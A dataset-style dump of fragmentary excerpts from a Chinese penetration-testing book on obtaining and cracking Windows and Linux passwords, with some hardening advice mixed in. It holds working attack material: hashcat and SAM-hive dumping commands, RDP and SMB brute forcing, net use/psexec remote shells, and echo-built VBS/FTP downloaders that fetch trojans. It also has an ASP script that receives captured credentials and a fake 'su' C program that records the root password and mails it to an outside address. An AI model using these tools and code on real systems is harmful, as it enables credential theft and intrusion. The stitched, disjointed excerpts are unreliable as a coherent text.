text
stringlengths
64
2.99M
1.通过设置超过一定位数的密码加固口令安全 使用彩虹表破解14位以下的密码相对容易,对于普通入侵者来说仅有3个免费表,破解的强度相对低一些,因此可以通过增加密码设置的位数加固系统口令。 笔者建议设置超过32位的密码加固系统口令。
03 选择“编辑”→“添加数值”选项。 04 设置数值名称为“LMCompatibilityLevel”,数值类型为“DWORD”,单击“确定”按钮。 05 双击新建的数据,并根据具体情况设置以下值。
0:发送LM和NTLM响应。 1:发送LM和NTLM响应。 2:仅发送NTLM响应。 3:仅发送NTLMv2响应(Windows 2000有效)。 4:仅发送NTLMv2响应,拒绝LM(Windows 2000有效)。 5:仅发送NTLMv2响应,拒绝LM和NTLM(Windows 2000有效)。
oclHashcat号称世界上最快的密码破解工具,是世界上第一个和唯一基于GPGPU规则的引擎,提供免费的多GPU(高达128个GPU)、多哈希、多操作系统(Linux和Windows本地二进制文件)、多平台(OpenCL和CUDA支持)、多算法机制,资源利用率低,基于字典攻击,支持分布式破解等。 oclHashcat for AMD的下载地址:http://hashcat.net/files/oclHashcat-1.31.7z oclHashcat for NVIDIA的下载地址:http://hashcat.net/files/cudaHashcat-1.31.7z oclHashcat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU进行密码破解,在操作系统上支持Windows、Linux平台,并且需要安装官方指定版本的显卡驱动程序,如果驱动程序版本不对,可能导致程序无法运行。
可以通过Catalyst自动侦测和下载检测工具来检测系统应该下载哪个版本,下载地址为http://support.amd.com/en-us/download/auto-detect-tool。 还可以通过360软件管理直接搜索“Catalyst”,选择合适的版本安装即可。
依次单击“开始”→“运行”选项,输入“cmd”并按“Shift+Ctrl+Enter”组合键,输入“net user antian365 password /add”,或者以管理员权限启动cmd.exe程序,执行成功后如图1-42所示。
目前,官方网站目前已经停止SAMInside软件的更新了,可以到华军软件园下载,地址为http://gwbnsh.onlinedown.net/down2/saminside.v2.6.1.0. chs.rar。
1.8.2 获取并整理密码Hash值 01 获取操作系统Hash值 有多个软件可以获取Windows 7操作系统的Hash值,如WCE、mimikatz、Cain、SAMInside等,在Windows Vista及以上版本中都有UAC权限控制机制。
UAC(User Account Control,用户账户控制)是微软为提高系统的安全性在Windows Vista中引入的新技术,它要求用户在执行可能影响计算机运行的操作,或者执行更改影响其他用户的设置的操作之前,提供权限或管理员密码。 通过在这些操作启动前对其进行验证,UAC可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上进行安装或对计算机进行更改。
选择saminside.exe程序,单击右键,在弹出的快捷菜单中选择“以管理员身份运行”选项,然后在SAMInside程序主界面中单击左起第3个图标,在弹出的菜单中选择“Import local user using Scheduler”选项,如图1-43所示,即可获取本机所有账号的密码Hash值等信息。 图1-43 获取密码Hash值 02 整理Hash值 在SAMInside中,既可以导出所有账号的Hash值,也可以复制单个账号的Hash值。
单击“File”菜单中的导出用户到Pwdump文件选项,即可导出获取的Hash值。 也可以选择Hash值,单击右键,在弹出的快捷菜单中依次选择“Copy”→“NT Hash”选项,获取NT Hash值。
对于Windows Vista及以上版本的操作系统,即使是普通的密码,也是以“AAD3B”开头的一串字符,这个值目前在Ophcrack等工具中无法破解,在SAMInside中会显示为一串“0”字符。
图1-44 整理需要破解的Hash值 1.8.3 破解Hash值 将准备好的字典ptemp.txt、需要破解的Hash值文件win2.hash复制到oclHashcat32程序所在的文件夹下,执行以下命令进行破解。 oclHashcat32 -m 1000 -a 0 -o winpass1.txt --remove win2.hash ptemp.txt “-m 1000”表示破解密码类型为NTLM。
Discuz!论坛密码算法md5(md5($pass).$salt),破解命令为“oclHashcat32 -m 2611 -a 0 -o winpass1.txt --remove dz. hash ptemp.txt”;
Linux SHA-512加密方式,破解命令为“oclHashcat32 -m 1800 sha512linux.txt p.txt”; Linux下的MD5加密方式,破解命令为“oclHashcat32 -m 500 linuxmd5.txt p.txt”。
未知 1.9 使用L0phtCrack破解Windows和Linux的密码 L0phtCrack是一款强大的密码审计工具,目前最新版本为6.0.20,官方下载地址为http://www.l0phtcrack.com/lc6setup_v6.0.20.exe。
LC5是网络管理员的必备的工具,可以用来检测Windows、UNIX/Linux用户是否使用了不安全的密码,同时,它也是最好、最快的Windows NT/2000/XP、UNIX/Linux管理员账号密码破解工具之一。
03 选择破解方法 在“选择破解方法”窗口有“快速口令破解”、“普通口令破解”、“复杂口令破解”和“自定义”4个选项,如图1-48所示,可以根据实际情况,按照先简单、后复杂的模式进行选择。
图1-48 选择破解方法 图1-49 选择报告风格 05 开始破解 向导设置完毕,LC5会将本地账号全部导入。 依次单击“会话”→“开始破解”选项,或者单击菜单下面的三角形图标,开始对系统账号进行破解。
将得到的Hash值保存为TXT文件,依次单击“会话”→“导入”选项,打开如图1-51所示的窗口,在“从文件导入”区域选中“从PWDUMP文件”单选项,即可选择Hash文件进行导入。 图1-51 选择导入Hash值 在“从文件导入”区域有4个选项,分别是“从SAM文件”、“从LC4文件”(LC5早期版本)、“从PWDUMP文件”和“从Unix shadow文件”(破解Linux密码),下面分别介绍。
从SAM文件:Windows NT/2000的SAM文件位于C:\WinNT\system32\config\ 目录下; Windows XP/2003/Vista的SAM文件位于C:\Windows\system32\config\ 目录下。 进入光盘或者通过其他工具访问DOS环境,即可将SAM文件复制出来。
L0phtCrack默认将未完成的任务保存成以“.lcs”结尾的文件,这样下次使用时就可以直接打开已经保存的任务继续破解,省去了每次都要重复破解的麻烦。
LC5是兼容LC4的,如果有未完成的LC4任务,或者在某些特定情况下只能使用LC5读取用户信息时,先将任务保存成LC4文件,再用LC5读取,也不失为一种好办法。
但是由于很多原因,如其他应用程序需要将用户名转换为uid,/etc/passwd文件就必须可以被所有人访问。 所以,系统引入了一种新的机制,将所有用户的密码信息存放在 /etc/shadow文件中,而这个文件是要有root权限才可以读取的,这样就保证了系统的安全性。
2.设置会话选项 图1-52 设置密码破解选项 在会话选项中包括LC5密码破解的所有选项,主要是字典破解、混合字典攻击、暴力破解和散列攻击的设置,如图1-52所示。
如图1-52所示,在“预定”区域选中“使用”复选框,这样“散列文件列表”按钮就会变为可用状态。 单击该按钮,打开“预定散列表”对话框,如图1-53所示。
如果了解要破解的密码的一些情况,如11位的密码,那么是手机号的可能性就很大。 如果知道要破解的密码的设置人的一些情况,如生日、姓名、喜欢的宠物等,则最好在下拉列表中选择“自定义”选项。 在使用暴力破解时,一般选择先易后难模式,即先尝试破解字母密码,再尝试破解字母、数字、普通符号的组合密码,最后尝试破解字母、数字、所有符号的组合密码。
使用LC5获取 *nux系统密码,是通过SSH的方式登录服务器获取的,所以,在使用LC5远程获取 /etc/shadow文件时,一定要确保拥有管理员权限,并确认远程服务器开启了SSH服务。
01 从远程计算机导入 打开“导入”对话框,选中“远程电脑”单选项,单击“确定”按钮,将弹出“从远程电脑导入”对话框,如图1-55所示,选中“UNIX系统”单选项。
图1-55 从远程计算机导入 图1-56 输入证书 03 设置破解方案 选择字典破解、混合字典攻击和暴力破解3种模式,如图1-57所示。 图1-57 设置密码破解方式 04 开始破解 如图1-58所示,将远程计算机中的用户全部导入,开始破解。
未知 1.10 通过hive文件获取系统密码Hash 登录目标的3389端口,获取密码Hash,然后通过彩虹表得到密码明文,或者使用WinlogonHack来记录3389端口的登录密码,这些方法很多人已经非常熟悉了。在笔者最近的几次渗透中,发现PWDump、fgdump这类工具已经不在免杀之列了,而且这类工具都是要注入lsass.exe进程的,遇到Macfee这类的杀毒软件,默认是无法绕过的。笔者测试了Winlogon网站放出的内容,对Windows 2008是没有效果的。最近笔者浏览博客,看到国外的技术人员提出了一种获取系统密码Hash的技巧,经过实践发现可行,下面分享给大家。 1.10.1 获取SAM、System及Security的hive文件 首先使用administrator账户登录,然后使用reg命令保存注册表中HKLM下的security、sam、system权限。在这里必须使用reg命令的save选项,不能使用export选项。直接执行以下命令,效果如图1-59所示。 C:\>reg save hklm\sam C:\sam.hive C:\>reg save hklm\system C:\system.hive C:\>reg save hklm\security C:\security.hive 图1-59 获取hive文件 对于非Windows 2000操作系统,可以通过以下命令备份。 C:\>regback.exe C:\backtemp\SAM machine sam C:\>regback.exe C:\backtemp\SYSTEM machine system 1.10.2 导入Cain工具 将sam.hive、system.hive和security.hive文件下载并存储到本地,打开Cain,在“Decoders”标签页单击“LSA Secrets”选项,然后单击“+”按钮导入system.hive和security.hive文件,如图1-60所示。 图1-60 导入hive文件 1.10.3 获取明文密码 导入成功后,就可以看到管理员的明文密码了,如图1-61所示。当然,这里的密码也可能是历史密码。 图1-61 获取明文密码 1.10.4 破解Hash密码 用获取的明文密码尝试登录。如果登录失败,则需要破解LM-Hash和NTLM-Hash的值。 单击“Cracker”标签页的“LM&NTLM Hashes”选项,然后单击“+”按钮,导入sam.hive文件。由于Windows 2000及以后的操作系统默认使用syskey,所以还要导入system.hive中syskey的值,然后就可以进行彩虹表破解了,如图1-62和图1-63所示。 图1-62 破解sam.hive文件 图1-63 破解系统密码 1.10.5 小结 这个方法并非对Windows的所有发行版本都有效,如对Windows 2000 SP4、Windows XP SP2就无效,而对Windows 2003/2008都有效,具体如下。 Windows 2000 SP4 (admin):拒绝访问(Access Denied)。 Windows XP SP2 (admin):拒绝访问(Access Denied)。 Windows XP SP3 (admin):拒绝访问(Access Denied)。 Windows 2003 R2 SP2 (admin):运行(Works)。 Windows Vista SP2 (UAC/admin):运行(Works)。 Windows 2008 SP1 (admin):运行(Works)。 Windows 7 (UAC/admin):运行(Works)。 未知 1.11 使用Fast RDP Brute破解3389口令 下面介绍使用Fast RDP Brute破解3389口令的方法。 1.11.1 Fast RDP Brute简介 Fast RDP Brute是俄罗斯的一款暴力破解工具,主要用于扫描远程桌面、连接弱口令。Fast RDP Brute官方下载地址为http://stascorp.com/load/1-1-0-58,运行后界面如图1-64所示。 图1-64 Fast RDP Brute主界面 1.11.2 设置主要参数 Fast RDP Brute的主要参数介绍如下。 Max threads:设置扫描线程数,默认值为1000,一般不用修改。 Scan timeout:设置超时时间,默认值为2000,一般不用修改。 Thread timeout:设置线程超时时间,默认值为60000,一般不用修改。 Scan ports:设置要扫描的端口,根据实际情况设置,默认值为3389、3390和3391。在实际扫描过程中,如果是对某个已知IP地址和端口进行扫描,建议删除多余端口。例如,对方端口为3388,则只保留3388即可。 IP ranges to scan:设置扫描的IP地址范围。 用户名和密码:可以在文件夹下的user.txt和pass.txt文件内自行设置。如图1-65所示,在默认的user.txt文件中包含俄文的管理员,一般不使用,可以根据实际情况进行设置。 图1-65 设置暴力破解的用户名和密码字典 1.11.3 局域网扫描测试 本次测试采用VMware环境,搭建两个平台,扫描主机IP地址为192.168.148.128,被扫描主机IP地址为192.168.148.132,操作系统为Windows 2003,开放3389端口。在该服务器上新建test、antian365用户,并将设置的密码复制到扫描字典中,单击“Start scan”按钮进行扫描,扫描结果如图1-66所示。 图1-66 扫描结果 注意 (1)在192.168.148.132服务器上必须开启3389端口。 (2)在扫描服务器上执行mstsc命令,输入IP地址192.168.148.132进行3389登录测试,看看能否访问网络。如果无法访问网络,则扫描无效。 1.11.4 小结 Fast RDP Brute的特点如下。 该软件虽然提供多个用户同时扫描的机制,但只要扫描出1个结果,就停止扫描。对于多用户扫描,可以在扫描出结果后,将已经扫描出来的用户删除,再进行扫描,或者针对单用户进行扫描。 扫描时间过长或者连接次数较多时,会显示“too many errors”错误。 该软件可以对单个用户进行已知密码扫描。在已经获取内网权限的情况下,可以对整个网络中开放3389端口的主机进行扫描,以获取权限。 DUBrute V4.2 RC也可以进行3389密码暴力破解测试,测试环境同上,实际测试效果为无法破解。
未知 1.12 Windows口令扫描攻击 Windows口令扫描攻击主要针对某个IP地址或者网段进口令扫描,其实质是通过139、445等端口尝试建立连接,利用的是DOS命令“net use \\ipaddress\admin$ "password" /u:user”,只不过是通过程序实现而已。
在NTscan中,一般只需要设置开始IP地址和结束IP地址,其他均采用默认设置,如图1-67所示。 图1-67 设置NTscan 说明 (1)如果是在肉机上进行口令扫描,由于语言版本不同,若操作系统不支持中文,就有可能显示乱码,这时只能凭借对系统的熟悉程度进行设置。
图1-68 NTscan显示乱码 (2)在NTscan中有IPC、SMB和WMI共3种扫描方式。 IPC和WMI方式扫描口令较为有效,SMB方式主要用来扫描共享文件。
SMB(服务器信息块)协议是一种IBM协议,用于在计算机之间共享文件、打印机、串口等。 SMB协议可以用在因特网TCP/IP协议之上,也可以用在其他网络协议(如IPX和NetBEUI)之上。
(3)WMI(Windows管理规范)是Windows管理技术中的一项核心技术。 作为一种规范和基础结构,通过WMI可以访问、配置、管理和监视几乎所有的Windows资源。
例如,在远程计算机上启动一个进程,设定一个在特定日期和时间运行的进程,远程启动计算机,获得本地或远程计算机的已安装程序列表,查询本地或远程计算机的Windows事件日志等。
一般情况下,可以在本地计算机上执行的WMI操作,也可以在远程计算机上执行,只要用户拥有该计算机的管理员权限即可。 如果用户对远程计算机拥有权限,并且远程计算机支持远程访问,那么用户就可以连接该远程计算机并执行拥有相应权限的操作。
1.12.2 执行扫描 在NTscan运行界面上单击“开始”按钮(如果显示为乱码,如图1-67所示,单击位于左侧设置区下方的第1个按钮),开始扫描,如图1-69所示。 图1-69 扫描口令 说明 (1)NTscan扫描口令与字典有关,其原理就是将字典中的口令与实际口令进行对比,如果相同就可以建立连接,即破解成功。 破解成功后会在NTscan窗口下方显示提示信息。
图1-70 NTscan扫描记录 (4)在NTscan中还有一些辅助功能,如单击鼠标右键后可以执行“cmd”命令,单击鼠标左键后可以执行“连接”、“打开远程登录”、“映射网络驱动器”等命令,如图1-71所示。 图1-71 NTscan辅助功能 1.12.3 实施控制 在DOS命令提示符下输入命令“net use \\221.*.*.*\admin$ "mrs6100"/u:administrator”,获取主机的管理员权限。
图1-72 获取管理员权限 1.12.4 执行psexec命令 执行“psexec \\221.*.*.* cmd”命令,获取一个DOSShell,如图1-73所示。 图1-73 获取DOS下的Shell 说明 (1)以上两步可以合并,直接在DOS命令提示符下输入命令“psexec \\ipaddress -u administrator -ppassword cmd”即可。 例如,在上例中可以输入“psexec \\221.*.*.* -u Administrator -pmrs6100 cmd”命令来获取一个DOSShell。
图1-74 查看端口开放情况 1.12.6 上传文件 在该DOSShell下执行文件下载命令,将一些工具软件或者木马上传到被入侵计算机中,如图1-75所示。
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe echo set aso=.createobject("adodb.stream"):set web=createobject ("microsoft.xmlhttp") >>dl.vbe echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile.arguments(1), 2:end with >>dl.vbe cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe (2)如果不能通过执行VBS脚本上传文件,则可以通过执行FTP命令上传文件。
echo open 192.168.1.1 >b echo ftp>>b echo ftp>>b echo bin>>b echo get systeminfo.exe >>b echo bye >>b ftp -s:b (3)上传文件时,建议先使用“dir filename”命令查看文件是否存在。 上传文件后,再通过“dir filename”命令查看文件是否上传成功。
1.远程终端技术App 大型企业一般都部署了远程终端,微软的服务器操作系统Windows 2008 Server更是重点打造了远程终端。 远程终端技术App是Windows Server 2008中新的远程应用演示方法,在一些远程连接参数上进行了调整,增加了新的功能,据说其性能也有较大提高。
这种管理在方向上不太固定,多数是发散式的,有的通过一台主机登录多台主机,有的通过多台主机登录一台主机,还有的可能出现交叉登录的情况。
黑客在入侵网络中的主机后,肯定会想办法收集网络内部或者与外部独立主机之间进行远程终端登录的用户名和密码,收集方法不外乎以下3种。 使用GetHashes、Pwdump等工具获取系统的Hash密码值,然后通过LC5及彩虹表进行破解,破解成功后得到系统密码,这些密码极有可能是远程终端的密码。 在被控制计算机上安装键盘记录,通过键盘记录获取用户在登录3389远程终端过程中所输入的用户名和密码。
1.gina.dll与msgina.dll gina.dll在Windows NT/2000中的交互式登录支持由winlogon.exe调用gina.dll实现。 gina.dll的交互式界面为用户登录提供认证请求。 winlogon.exe与gina.dll进行交互,默认是msgina.dll(在system32目录下)。 微软提供了接口,让开发人员自己编写gina.dll来代替msgina.dll。 不知道出于什么原因,gina.dll在Windows XP及后续版本中不再出现,原来的gina.dll改为msgina.dll(“ms”表示微软)。 msgina.dll在Windows XP系统中默认为967 680字节(945KB),在Windows 2003中为1 180 672字节(1 153KB)。
2.msgina.dll文件被破坏或修改将导致严重错误 在DLL知识库(http://www.dofile.com/dlllibrary/msgina/)中是这样描述的:msgina.dll是Windows登录认证策略相关模块,该模块用于完成所有用户的登录和验证功能,如果系统中的这个文件被修改或者破坏,将导致系统无法使用3389端口进行登录。 如图1-77所示,这个系统的msgina.dll文件就被破坏了,从而导致用户无法远程登录3389终端服务器。 图1-77 msgina.dll 被破坏或修改导致无法登录远程终端 3.WinlogonHack截取密码的原理 WinlogonHack通过挂钩系统中msgina.dll的WlxLoggedOutSAS函数记录登录的账户密码。
默认情况下,gina.dll或者msgina.dll用于显示登录对话框,用户可以输入用户名和密码。 所以,要想获得用户名和密码,可以写一个新的gina.dll或者msgina.dll,其中提供接口调用msgina.dll的函数是WlxLoggedOutSAS。
1.执行install.bat安装脚本 一种方法是将WinlogonHack的安装程序文件hookmsgina.dll、install.bat、on.reg、readlog.bat复制到同一个文件夹下,在DOS提示符或GUI界面直接运行install.bat。
图1-78 远程安装WinlogonHack获取3389登录密码 2.查看密码记录 可以直接打开boot.dat文件查看,也可以运行readlog.bat脚本,然后将密码文件移动到当前目录中查看。
1.13.4 WinlogonHack攻击与防范方法探讨 下面我们讨论WinlogonHack的攻击和防范方法。 1.攻击方法探讨 (1)定制化开发 WinlogonHack的代码是开源的,因此,入侵者可以定制它,即在“lstrcat(LogPath, "\\boot.dat");”语句中将“boot.dat”换成任意一个文件。
入侵者还可以在此基础上增加一个邮件发送功能,将记录下来的3389远程终端用户名和密码发送到指定的邮箱,笔者在安全加固过程中就曾经碰到具有这种功能的3389密码截取木马。
(2)对WinlogonHack软件进行免杀处理 图1-80 杀毒软件会自动查杀wminotify.dll文件 由于WinlogonHack在网络入侵中扮演了一个重要的辅助角色,所以一些杀毒软件会自动查杀wminotify.dll文件。
(3)WinlogonHack在攻击中的应用 WinlogonHack主要用于截取3389登录密码,因此,在被入侵计算机上运行MSTSC后,如果发现MSTSC的“计算机”列表中出现多个登录IP地址,如图1-81所示,那么该计算机就有安装WinlogonHack的必要,从而记录在服务器上管理员所登录的3389用户名和密码。 图1-81 获取3389登录地址列表 2.防范方法探讨 在系统目录中查找“wminotify.dll”文件,如果这个文件存在,则说明系统中一定安装了WinlogonHack。
如果不能卸载,可以重启后再次卸载。 到注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon\Notify\wminotify键值下查看,如果存在,则将其删除。 定制的WinlogonHack比较难根除,一个较好的办法是在安全状态下进行一次系统文件名称列表备份。
定期杀毒。 杀毒软件在一定程度上能够防范一些已知病毒,因此,要勤杀毒、勤看日志,在确认系统被入侵后一定要仔细、彻底地进行安全检测。
1.13.5 使用WinlogonHack自动获取密码并发送到指定网站 使用WinlogonHack自动获取密码并发送到指定网站的步骤如下。 01 配置Winlogon劫持记录3389密码生成器 互联网上有很多Winlogon劫持记录3389密码生成器,如图1-82所示。
图1-82 配置接收文件地址 02 上传密码接收文件 将以下代码保存为3389.asp,并将其放在一个可以访问的网站目录下,同时必须让3389.asp具有写文件权限。
<% Dim ValidEntry ValidEntry = True If not IsEmpty(Session("LogIn")) then ValidEntry = False If ValidEntry Then Const ForAppending = 8 Const Create = true Dim FSO DIM TS DIM MyFileName 'Dim strLog Dim strTime,strUrl,strOporation,strUserAgent MyFileName = Server.MapPath("myIP.txt") Set FSO = Server.CreateObject("Scripting.FileSystemObject") Set TS = FSO.OpenTextFile(MyFileName, ForAppending, Create) strUrl=Request.ServerVariables("REMOTE_ADDR") &amp; " " Ts.writeline "----分割线----" Ts.writeline "服务器IP:"&amp;strUrl Session("LogIn") = "yes" Set TS = Nothing Set FSO = Nothing End If num=request("user") pass=request("pass") hxip=request("ip") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("IP.txt"),8,True) if hxip <>"" then file.writeline num+"----"+pass+"----ip:"+hxip else file.writeline num+"----"+pass end if file.close set file=nothing set fs=nothing %> 03 查看本地密码记录文件 在测试服务器上执行EXE文件。
需要特别注意的是,由于网上的软件有可能捆绑了木马程序,所以所有生成的EXE文件最好在虚拟机上运行,这样做不会破坏实体机。 执行EXE文件后,需要打开mstsc.exe(即远程终端),登录127.0.0.1。
登录成功后,在c:\windows\system32\ 目录下运行“dir /od”命令,即可看到Winlogon劫持记录3389密码工具软件释放的4个程序,分别是install.bat、wminotify.dll、On.reg和wpa.dbl。
图1-83 获取密码记录 04 查看网站记录文件 访问网页记录文件所在的服务器,直接打开ip.txt文件,或者访问类似于“http:// www.antian365.com/ip.txt”的地址。
未知 1.14 检查计算机账号克隆情况 随着个人计算机安全意识的提高,网络木马程序的生命周期越来越短,如果要使木马软件实现免杀,必须掌握软件加壳、修改特征码等技术。对于网络上的计算机,特别是网络服务器,被成功控制以后,对账号进行克隆基本上已经成为入侵者的习惯。在系统管理员更改系统账号以后,使用克隆用户账号登录并重新控制系统是一个非常不错的选择。下面,笔者将与大家分享一些维护网络服务器的经验,共保服务器安全。 计算机的常规检查主要通过依次单击“我的电脑”→“管理”→“计算机管理”→“本地用户与组”选项实施,检查管理员组中是否存在多余账号及是否存在多个用户账号。 1.14.1 检查用户 操作系统中默认存在administrator用户及其他用户,如本例中的“simeon”,以及启动IIS进程账户、Internet来宾账号等,如图1-85所示。这些账号往往与系统中提供的服务或者安装的软件有关。如果在检查过程中发现了多余的账号,则极有可能是入侵者添加的。 图1-85 检查用户账号 1.14.2 检查组 任何用户账号都必须属于一个组。在安全检查中,需要特别注意Administrators组,这个组是具有管理员权限的组。在“计算机管理”窗口双击“组”中的“Administrators”,即可查看其中是否存在多余的管理员账号,如图1-86所示。 图1-86 管理员组账号检查 说明 (1)对账号的检查也可以在DOS提示符下实现。依次单击“开始”→“运行”,输入“cmd”或者“command”命令,进入DOS提示符窗口,然后输入“net user”查看系统中的所有用户,输入“net localgroup administrators”查看管理员组,如图1-87所示。可以通过“net user username /delete”命令删除用户。 图1-87 在DOS窗口查看用户和管理员信息 (2)如果入侵者在添加账号时在账号末尾加上了“$”符号,那么在使用“net user”命令查看用户时,以“$”结束的用户名不会显示。这种账号只能通过图形界面查看。 在系统中添加的非克隆账号,可以通过常规检查找出。但是,如果入侵者在系统中对账号进行了克隆(通常是克隆系统中已经存在账号),如克隆aspnet、TsInternetuser、Guest等账号,那么通过“net user”、“net localgroup administrators”命令及图形界面都无法查出。如果计算机开放了远程终端或安装了pcAnywhere等工具,入侵者就可以通过这些账号正常访问系统了。非常规检查主要通过工具软件Mt或本地管理员检测工具进行。Mt只能运行在DOS环境中,而本地管理员检测工具是图形界面,功能相对少一些。由于Mt功能强大,目前很多杀毒软件都把它列为黑客工具进行查杀。 1.14.3 使用Mt进行检查 Mt提供了很多功能,使用时要求权限为system,在Windows XP中可能会提示权限不够而无法使用。在DOS窗口或者其他管理软件的Telnet窗口输入命令“mt”,即可查看详细的命令说明。本节只使用“mt -chkuser”命令。如图1-88所示,检查系统克隆账号,输入命令后会在屏幕上输出结果。主要查看ExpectedSID和CheckedSID,如果这两个值不一样,就说明账号被克隆了。可以看到,simeon$ 账号的CheckedSID和Administrator账号的CheckedSID值一样,说明simeon$账号克隆了Administrator账号。 图1-88 检查克隆账号 1.14.4 使用本地管理员检测工具进行检查 直接运行本地管理员检测工具,程序会自动显示系统中存在的账号,并给出相应的提示,提示信息通常为“影子管理员?”,如图1-89所示。 图1-89 使用本地管理员检测工具检查克隆账号 如果计算机提供3389远程终端服务或者安装了pcAnywhere等远程控制工具,就需要定期检查系统用户账号。一旦发现克隆账号,就说明系统的安全风险非常大,单独删除克隆账号意义不大。建议使用系统备份进行恢复,并更改系统中所有账号的密码。
设定系统口令时,大部分用户都会使用自己熟悉的单词,或者其他习惯使用的数字,如电话号码、生日等,这样做在便于记忆的同时,也悄悄为入侵者打开了方便之门。
1.口令设置上的漏洞 中国杀毒网记载了一个有趣的心理试验:随机抽出100名在校大学生,要求他们分别写下两个单词,并告诉他们这两个单词是用于计算机的口令,非常重要,且将来的使用率也很高,要求他们尽量慎重考虑,结果却出人意料。
2.社会工程学对口令的攻击 黑客在入侵过程中会利用Google、百度等搜索引擎充分收集被攻击对象的各种资料,在攻击中这些资料将起到辅助作用。
利用传统手法,如SQL注入、漏洞溢出等,得到一个分站的服务器权限,然后根据在分站上收集的电子邮箱信息、FTP信息、网络拓扑信息、管理员常用的管理工具等渗透主站。
很多人拿到IE 0day就直接挂马,其实IE 0day还有更高的价值,那就是发送邮件,如果管理员被欺骗并点击了入侵者发送邮件里的URL,后果就很难预料了。
通过各种手段取得内网管理员或用户的信任,获得他的信息,如QQ、电子邮箱等,抓住他的弱点,降低他的心理防线,在成熟的时候发送URL或在打包的软件里捆绑木马等,内网将又一次面临攻击。
1.15.2 系统密码安全设置策略 系统密码安全设置策略如下。 1.通过组策略加固密码 在“开始”→“运行”窗口中输入“gpedit.msc”并按“回车”键,就可以打开“组策略”窗口,如图1-90所示。 图1-90 打开“组策略”窗口 在“组策略”窗口的左侧展开“计算机配置”→“Windows设置”→“安全设置”→“账户策略”→“密码策略”选项,在右边窗格中就会出现一系列的密码设置项。
图1-91 修改密码的默认策略 (1)密码必须符合复杂性要求 如果启用了这个策略,那么在设置和更改一个密码时,系统将会按照下面的规则检查密码是否有效。
可以将密码设置为在某些天数(1到999)后到期,或者将天数设置为0(密码永不过期)。 如果密码最长使用期限介于1到999天,密码最短使用期限必须小于密码最长使用期限。 如果将密码最长使用期限设置为0,则可以将密码最短使用期限设置为0到998天之间的任何值。 注意 最佳操作是将密码设置为30到90天后过期,具体取决于用户的环境。
配置这个策略可以让系统记住用户曾经使用的密码,如果更换的新密码与系统“记忆”中的重复,系统就会给出提示。 默认情况下,这个策略不保存用户的密码,用户可以根据自己的习惯进行设置,建议保存5个以上(最多可以保存24个)的密码。 (5)密码最短使用期限 此安全设置确定在用户更改某个密码之前必须使用该密码一段时间(以天为单位)。 可以设置一个介于1到998的值,或者将天数设置为0(允许立即更改密码)。 密码最短使用期限必须小于密码最长使用期限,除非将密码最长使用期限设置为0(密码永不过期)。 如果将密码最长使用期限设置为0,则可以将密码最短使用期限设置为0到998之间的任何值。 如果希望“强制密码历史”有效,需要将密码最短使用期限设置为大于0的值。 如果没有设置密码最短使用期限,用户则可以循环选择密码,直到获得期望的旧密码。
从上面这些设置项中我们不难得到一个最为简单有效的密码安全方案,即启用“密码必须符合复杂性要求”策略,然后设置“密码最短存留期”,最后开启“强制密码历史”。
设置完成后,在“控制面板”中重新设置管理员的密码,这时的密码不仅本身是安全的(不低于6位且包含不同类别的字符),而且以后修改密码时也不易出现与以前重复的情况,这样的系统密码安全性非常高。 2.密码设置技巧 密码的位数不要少于6位,笔者设置的密码为32位。
不要用a、b、c等比较小顺序的字母或数字开头,因为字典暴力破解一般都是从数字或英文字母排序开始的,字母或数字顺序越小,破解机率就越高。
在“开始”→“运行”窗口中输入“cmd”并按“回车”键,在窗口中输入命令“net user”查看是否被添加了新用户,然后输入命令“net localgroup administrators”查看是否有用户被提升了管理员权限。
01 打开日志管理器 依次单击“开始”→“程序”→“管理工具”→“事件查看器”选项,如图1-93所示。 图1-93 打开事件查看器 02 设置日志属性 如图1-94所示,在“系统 属性”对话框的“常规”选项卡中可以对日志的大小、时间进行设置,如果发现日志记录不是在这个范围内,那么系统可能就被人“闯入”,而且修改了日志。 03 使用筛选器记录日志审核结果 打开筛选器,对日志中的事件类型等进行筛选。
图1-94 修改日志默认设置 图1-95 使用筛选器记录事件 属性设置好后,就可以查看日志了,从中我们可以发现入侵者的蛛丝马迹。 为了预防入侵者对日志的破坏,我们要定期对日志进行备份,如果有需要,还可以恢复之前的日志文件。
未知 第2章 Linux操作系统密码的获取与破解 在网络渗透过程中,经常碰到通过Struts等漏洞获取WebShell及系统最高管理root权限的情况。但由于操作系统设置了强悍的密码策略等,即使入侵者获取了shadow文件中的root密码加密值,也会因为Linux密码较难破解而放弃。 本章着重介绍Linux操作系统密码的获取与破解,并通过实际案例图文并茂地展现其过程,使读者看完这些案例就能很快上手。 本章主要内容 使用fakesu记录root用户的密码 暴力破解工具Hydra Linux操作系统root账号密码的获取 安全设置Linux操作系统的密码 Linux OpenSSH后门获取root密码
未知 2.1 使用fakesu记录root用户的密码 在Linux渗透中,比较容易获取服务器上网站的WebShell。就目前的环境来说,Linux服务器提权比较困难。那么,如何在获取WebShell权限的情况下,通过WebShell反弹到指定了独立IP地址的服务器上,通过反弹的Shell安装程序捕获root用户的密码?本节就目前已知的记录root用户密码的方法进行探讨。 2.1.1 使用kpr-fakesu.c程序记录root用户的密码 kpr-fakesu.c程序的新版本为0.9beta167,它是由koper开发的(koper@linuxmail.org),程序代码如下。 #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]){ FILE *fp; char *user; char *pass; char filex[100]; char clean[100]; sprintf(filex,"/var/tmp/.mail"); sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/webshell/.wgetrc /home/ webshell/ .bash_profile"); if(argc==1) user="root"; if(argc==2) user=argv[1]; if(argc>2){ if(strcmp(argv[1], "-l")==0) user=argv[2]; else user=argv[1];} fprintf(stdout,"Password: "); pass=getpass (""); system("sleep 3"); fprintf(stdout,"su: Authentication failure\nSorry.\n"); if ((fp=fopen(filex,"w")) != NULL) { fprintf(fp, "%s:%s\n", user, pass); fclose(fp); } system(clean); system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su"); system("uname -a >> /var/tmp/.mail; cat /var/tmp/.mail | mail admin@antian365.com"); } 2.1.2 运行前必须修改程序 